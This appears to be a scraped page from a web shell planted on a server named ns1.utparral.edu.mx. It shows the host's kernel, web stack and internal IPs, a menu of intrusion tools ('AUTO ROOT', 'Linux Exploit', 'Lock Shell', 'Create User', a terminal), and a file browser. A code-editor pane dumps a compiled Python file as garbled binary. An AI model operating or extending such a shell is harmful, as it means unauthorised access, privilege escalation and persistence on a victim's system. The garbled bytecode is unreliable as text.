Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
debian /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
arfile.cpython-310.pyc
9.79
KB
-rw-r--r--
changelog.cpython-310.pyc
26.91
KB
-rw-r--r--
copyright.cpython-310.pyc
20.59
KB
-rw-r--r--
deb822.cpython-310.pyc
73.79
KB
-rw-r--r--
debfile.cpython-310.pyc
12.91
KB
-rw-r--r--
debian_support.cpython-310.pyc
19.8
KB
-rw-r--r--
debtags.cpython-310.pyc
13.86
KB
-rw-r--r--
deprecation.cpython-310.pyc
1
KB
-rw-r--r--
__init__.cpython-310.pyc
808
B
-rw-r--r--
_util.cpython-310.pyc
10.93
KB
-rw-r--r--
_version.cpython-310.pyc
215
B
-rw-r--r--
watch.cpython-310.pyc
6.33
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : debian_support.cpython-310.pyc
o ���ak � @ s� d Z ddlZddlZddlZz&ddlmZmZmZmZm Z m Z mZmZm Z mZmZmZmZmZmZmZ W n ey= Y nw ddlmZ zddlZe�� dZW n ey[ dZY nw z ddlZejZW n eyr dd� ZY nw z ddlZejZ W n ey� d d � Z Y nw G dd� de!�Z"G d d� de#�Z$G dd� de$�Z%G dd� de$�Z&er�G dd� de%�Z'nG dd� de&�Z'dd� Z(G dd� d�Z)G dd� d�Z*G dd� de*�Z+dd� Z,ee,�Z-e,� Z.d6d d!�Z/ee/�Z0[-[,d"d#� Z1d$d%� Z2ee2�Z3d&Z4e�5e4�Z6e�5e4�7d'��Z8 d6d(d)�Z9ee9�Z:d*d+� Z;ee;�Z<d7d,d-�Z=ee=�Z>d.d/� Z?ee?�Z@d0d1� ZAeeA�ZBd8d2d3�ZCeeC�ZDd4d5� ZEeeE�ZFdS )9z2 Facilities to deal with Debian-specific metadata � N)�Any�AnyStr�BinaryIO�Dict�Iterable�Iterator� Generator�List�Match�NoReturn�Optional�Pattern�Text�TextIO�Tuple�Union)�function_deprecated_byTFc G � t d���Nz�Built-in sha1 implementation not found; cannot use hashlib implementation because it depends on OpenSSL, which may not be linked with this library due to license incompatibilities��NotImplementedError��args� r �7/usr/lib/python3/dist-packages/debian/debian_support.py�new_sha1? � �r c G r r r r r r r � new_sha256N r r c s@ e Zd ZdZ� fdd�Zdd� Zdd� Zdd � Zee�Z � Z S ) � ParseErrorz�An exception which is used to signal a parse failure. Attributes: filename - name of the file lineno - line number in the file msg - error message c s4 t |t�sJ �|| _|| _|| _tt| ��| � d S �N)� isinstance�int�filename�lineno�msg�superr �__init__)�selfr"